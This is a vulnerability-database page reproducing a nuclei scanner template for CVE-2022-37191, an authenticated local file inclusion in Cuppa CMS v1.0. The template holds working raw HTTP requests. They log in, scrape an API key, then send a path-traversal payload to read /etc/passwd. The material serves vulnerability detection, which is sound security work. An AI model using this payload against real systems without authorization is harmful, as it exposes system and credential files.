Lucene search
K

Cuppa CMS v1.0 - Authenticated Local File Inclusion

🗓️ 03 Jun 2026 06:04:49Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 23 Views

Cuppa CMS v1.0 - LFI Vulnerability, Authenticated User Acces

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-37191
13 Sep 202223:15
attackerkb
Circl
CVE-2022-37191
14 Sep 202202:25
circl
CNNVD
CuppaCMS 安全漏洞
13 Sep 202200:00
cnnvd
CVE
CVE-2022-37191
13 Sep 202222:07
cve
Cvelist
CVE-2022-37191
13 Sep 202222:07
cvelist
NVD
CVE-2022-37191
13 Sep 202223:15
nvd
Prion
Cross site request forgery (csrf)
13 Sep 202223:15
prion
Positive Technologies
PT-2022-23865 · Cuppacms · Cuppacms
13 Sep 202200:00
ptsecurity
RedhatCVE
CVE-2022-37191
22 May 202523:19
redhatcve
id: CVE-2022-37191

info:
  name: Cuppa CMS v1.0 - Authenticated Local File Inclusion
  author: theamanrawat
  severity: medium
  description: |
    The component "cuppa/api/index.php" of CuppaCMS v1.0 is Vulnerable to LFI. An authenticated user can read system files via crafted POST request using [function] parameter value as LFI payload.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the authenticated local file inclusion vulnerability in Cuppa CMS v1.0.
  reference:
    - https://github.com/CuppaCMS/CuppaCMS
    - https://nvd.nist.gov/vuln/detail/CVE-2022-37191
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2022-37191
    cwe-id: CWE-829
    epss-score: 0.32373
    epss-percentile: 0.96934
    cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: cuppacms
    product: cuppacms
  tags: cve,cve2022,lfi,cuppa,authenticated,cuppacms,vuln

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&password={{password}}&language=en&task=login
      - |
        POST /components/table_manager/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        path=component%2Ftable_manager%2Fview%2Fcu_api_keys
      - |
        POST /api/index.php HTTP/1.1
        Host: {{Hostname}}
        key: {{apikey}}
        Content-Type: application/x-www-form-urlencoded

        function=./../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd/

    matchers-condition: and
    matchers:
      - type: word
        part: header_3
        words:
          - "text/html"

      - type: regex
        part: body_3
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: apikey
        group: 1
        regex:
          - "<td class='td_key'>(.*?)</td>"
        internal: true
# digest: 4a0a0047304502205382cf4353e60b566ae9508d29827a843fb9021bda5525bc91de8c604608dce50221009535452a158fa1afde2673e89288841c5e750c0a83f183570f0f7acc5b58d849:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 3.16.5
EPSS0.32373
23